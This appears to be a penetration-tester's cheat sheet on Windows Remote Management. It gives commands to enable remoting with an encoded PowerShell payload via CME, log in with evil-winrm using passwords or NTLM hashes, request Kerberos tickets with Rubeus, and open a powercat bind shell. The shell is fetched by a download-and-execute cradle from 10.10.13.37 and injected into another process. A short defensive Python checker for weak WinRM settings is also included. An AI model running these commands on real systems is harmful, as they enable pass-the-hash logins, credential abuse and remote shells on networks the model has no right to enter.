| description |
|---|
| Windows Remote Management |
- https://www.bloggingforlogging.com/2018/01/24/demystifying-winrm/
- https://www.powershellmagazine.com/2014/03/06/accidental-sabotage-beware-of-credssp/
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/network-vs-interactive-logons
- https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-winrm
Using PowerShell (takes about a minute to apply):

```powershell
PS > Enable-PSRemoting -Force
PS > Set-Item wsman:\localhost\client\trustedhosts *
```
Remotely with CME:

```bash
$ cme smb 10.10.13.37 -u snovvcrash -p 'Passw0rd!' -x 'powershell -enc RQBuAGEAYgBsAGUALQBQAFMAUgBlAG0AbwB0AGkAbgBnACAALQBGAG8AcgBjAGUAOwBTAGUAdAAtAEkAdABlAG0AIAB3AHMAbQBhAG4AOgBcAGwAbwBjAGEAbABoAG8AcwB0AFwAYwBsAGkAZQBuAHQAXAB0AHIAdQBzAHQAZQBkAGgAbwBzAHQAcwAgACoACgA=' --no-output
```
```powershell
PS > winrm get winrm/config
PS > winrm set winrm/config/client '@{TrustedHosts="*"}'
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred
PS > Enter-PSSession -Session $sess
PS > Copy-Item .\file.txt -Destination "C:\users\administrator\music\" -ToSession $sess
```
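Setting `TrustedHosts` to `*` (as in the commands above) makes the client willing to send credentials to any host, and Basic/CredSSP/unencrypted settings widen exposure further. The following added example (not part of these notes) audits captured `winrm get winrm/config` output offline: it flattens winrm's indented key/value tree into dotted paths and flags the weak client and service settings; the sample output is constructed, and the set of weak settings is the author of this example's own choice.

```python
import re

# Constructed sample shaped like 'winrm get winrm/config' after 'Set-Item wsman:\localhost\client\trustedhosts *'.
SAMPLE_CONFIG = """\
Config
    Client
        AllowUnencrypted = false
        Auth
            Basic = true
            CredSSP = false
        TrustedHosts = *
    Service
        AllowUnencrypted = false
        Auth
            Basic = false
            CredSSP = false
        AllowRemoteAccess = true [Source="GPO"]
"""

# Dotted setting path -> the value that widens exposure (chosen for this example).
WEAK_SETTINGS = {
    "Config.Client.TrustedHosts": "*",        # client will talk to any host
    "Config.Client.Auth.Basic": "true",       # password sent as Basic auth
    "Config.Client.Auth.CredSSP": "true",     # reusable creds delegated to the remote end
    "Config.Service.Auth.Basic": "true",
    "Config.Service.AllowUnencrypted": "true",
}

def parse_winrm_config(text):
    """Flatten winrm's indented tree into {'Config.Client.TrustedHosts': '*', ...}."""
    settings, stack = {}, []          # stack holds (indent, section name)
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        while stack and stack[-1][0] >= indent:
            stack.pop()               # left a nested section
        line = re.sub(r"\s*\[Source=.*\]$", "", raw.strip())  # drop [Source="GPO"]
        if " = " in line:
            key, value = line.split(" = ", 1)
            settings[".".join(n for _, n in stack) + "." + key] = value.strip()
        else:                         # section header (or a key with an empty value)
            stack.append((indent, line))
    return settings

def find_weak_settings(text):
    """Return sorted 'path = value' strings for each weak setting present."""
    parsed = parse_winrm_config(text)
    return sorted(f"{p} = {parsed[p]}" for p, bad in WEAK_SETTINGS.items()
                  if parsed.get(p, "").lower() == bad)
```

Paste the real output of `winrm get winrm/config` in place of the sample; `find_weak_settings` then lists every flagged setting with its current value.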
Basic syntax:

```bash
$ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i 10.10.13.37 -s `pwd` -e `pwd`
$ evil-winrm -u '[MEGACORP\]snovvcrash' -H fc525c9683e8fe067095ba2ddc971889 -i 10.10.13.37 -s `pwd` -e `pwd`
```
{% hint style="info" %}
Always use the full username (with the domain prefix) when authenticating as a domain user: if a local user and a domain user share the same name, say WORKGROUP\Administrator and MEGACORP\Administrator, and you try to authenticate as the domain admin without providing the domain prefix, authentication will fail.
{% endhint %}
Execute a .NET binary:

```powershell
*Evil-WinRM* PS > Invoke-Binary Rubeus.exe "asktgt, /domain:megacorp.local, /user:snovvcrash, /rc4:fc525c9683e8fe067095ba2ddc971889, /nowrap"
```
Spawn an interactive bind shell with powercat.ps1 and Invoke-PSInject.ps1:

```bash
$ sed -i s/powercat/pwcat/g pwcat.ps1
$ echo 'powercat -l -p 1337 -e cmd.exe' >> pwcat.ps1
$ echo 'IEX(New-Object Net.WebClient).DownloadString(''http://10.10.13.37/pwcat.ps1'')' | iconv -t UTF-16LE | base64 -w0
```

```powershell
*Evil-WinRM* PS > Get-Process
*Evil-WinRM* PS > Invoke-PSInject.ps1
*Evil-WinRM* PS > Invoke-PSInject -ProcId <PID> -PoshCode <BASE64_CMD>
```

```bash
$ rlwrap nc 192.168.1.11 1337
```
```powershell
$ pwsh
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred -Authentication Negotiate
PS > Enter-PSSession -Session $sess
```